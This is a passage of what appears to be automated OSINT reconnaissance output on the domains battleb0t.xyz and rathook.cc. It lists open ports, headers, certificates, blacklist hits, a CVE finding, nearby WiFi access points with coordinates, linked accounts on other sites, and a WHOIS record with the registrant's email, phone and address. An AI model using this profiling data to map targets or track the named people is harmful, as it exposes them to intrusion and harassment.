1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001748]\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "kangbinkwon-Netflix_clonecoding_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001748]\n "nficon2016_1_.ico" has type "MS Windows icon resource - 1 icon 64x64 32 bits/pixel"- [targetUID: N/A]\n "~DFF6F278D010A12D33.TMP" has type "data"- Location: [%TEMP%\\~DFF6F278D010A12D33.TMP]- [targetUID: 00000000-00001748]\n "~DF048C015CE4B792F4.TMP" has type "data"- Location: [%TEMP%\\~DF048C015CE4B792F4.TMP]- [targetUID: 00000000-00001748]\n "~DF0EACE11BF |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F1:84:FA) | 37.7642, -122.3993 |
| 2023-05-12 03:33:59 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
IDATX
[remaining extracted strings are unreadable PNG image-data bytes and are omitted] | https://funny.battleb0t.xyz/images/ein_1.png |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTFiQVKTA (Net ID: E8:33:81:CE:14:60) | 37.751, -97.822 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Moneysavingexpert (Category: finance)
https://forums.moneysavingexpert.com/profile/ayhu | ayhu |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:8443 | 188.114.97.0/24 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | rathook.cc | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2078 | 87.248.157.102 |
| 2023-05-12 02:45:47 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8001::153 |
| 2023-05-12 03:03:26 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00088.github.io |
| 2023-05-12 03:11:13 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 3 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | vscode.battleb0t.xyz |
| 2023-05-12 02:54:57 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c443d4879e76326-ORD
Content-Encoding: gzip
| 2a06:98c1:3120::1 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 03:38:37 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.160) | 207.154.228.160 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.67): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.109.153 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | France | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the
expiration date of the domain name registrant's agreement with the
sponsoring registrar. Users may consult the sponsoring registrar's
Whois database to view the registrar's reported date of expiration
for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign's ("VeriSign") Whois
database is provided by VeriSign for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. VeriSign does not guarantee its accuracy.
By submitting a Whois query, you agree to abide by the following terms of
use: You agree that you may use this Data only for lawful purposes and that
under no circumstances will you use this Data to: (1) allow, enable, or
otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via e-mail, telephone, or facsimile; or
(2) enable high volume, automated, electronic processes that apply to
VeriSign (or its computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without
the prior written consent of VeriSign. You agree not to use electronic
processes that are automated and high-volume to access or query the
Whois database except as reasonably necessary to register domain names
or modify existing registrations. VeriSign reserves the right to restrict
your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
The Data in the Porkbun LLC WHOIS database is provided by Porkbun LLC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Porkbun LLC does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to Porkbun LLC (or its systems). Porkbun LLC reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Porkbun!
|
| 2023-05-12 02:55:21 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 207.154.228.169:22 | 207.154.228.169 |
| 2023-05-12 03:33:49 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | MiCCPICC Profile
pHYs
iTXtXML:com.adobe.xmp
<exif:PixelYDimension>1024</exif:PixelYDimension>
<exif:PixelXDimension>1024</exif:PixelXDimension>
<tiff:Orientation>1</tiff:Orientation>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
IDATx
IDATE
[remaining extracted strings are unreadable PNG image-data bytes and are omitted] | https://fluid.battleb0t.xyz/logo.png |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000b000.github.io]
https://www.openphish.com/feed.txt | 000b000.github.io |
| 2023-05-12 02:46:50 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| 34.74.170.74 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | vscode.battleb0t.xyz |
| 2023-05-12 02:55:27 | BGP AS Membership | No | URLScan.io | 0 | 0 | 1 | 0 | None | 14061 | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000407.github.io | 185.199.111.153 |
| 2023-05-12 03:11:27 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14806242598', u'local': u'(480) 624-2598'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14806242598', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14806242598 |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.84): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.109 | 87.248.157.102 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.213): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Paradiso Films - NL (Net ID: 00:01:21:31:1A:19) | 52.3759, 4.8975 |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-110-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-110-153.github.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PARPUDAR (Net ID: 00:02:CF:AD:76:95) | 40.2024, 29.0398 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.146): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/Altpapier?version=2 | Altpapier |
| 2023-05-12 02:46:42 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 34.74.170.74 |
| 2023-05-12 02:44:21 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo04216 (Net ID: 00:0C:F6:5A:10:78) | 50.8897, 6.0563 |
| 2023-05-12 03:16:19 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ENG', u'country_tld': u'.uk', u'ip': u'2a06:98c1:3121::1', u'currency_name': u'Pound', u'currency': u'GBP', u'country_population': 66488991, u'country_code': u'GB', u'timezone': u'Europe/London', u'city': u'London', u'network': u'2a06:98c1::/32', u'languages': u'en-GB,cy-GB,gd', u'version': u'IPv6', u'latitude': 51.5095, u'in_eu': False, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'United Kingdom', u'country_capital': u'London', u'org': u'CLOUDFLARENET', u'postal': u'EC4N', u'asn': u'AS13335', u'country': u'GB', u'region': u'England', u'longitude': -0.0955, u'country_calling_code': u'+44', u'country_area': 244820.0, u'country_code_iso3': u'GBR'} | 2a06:98c1:3121::1 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.97): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:8C:21:B1) | 39.0469, -77.4903 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | krillnet (Net ID: 00:01:8E:15:D4:A6) | 37.780462,-122.390564 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-g (Net ID: 00:06:25:C0:3E:05) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.193): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/master058_2.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MyBuilder.com (Category: social)<br>https://www.mybuilder.com/profile/view/ayshoo | ayshoo |
| 2023-05-12 02:45:51 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 2 | 0 | None | webroot.com [104.21.6.166] | 104.21.6.166 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", 
"resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": 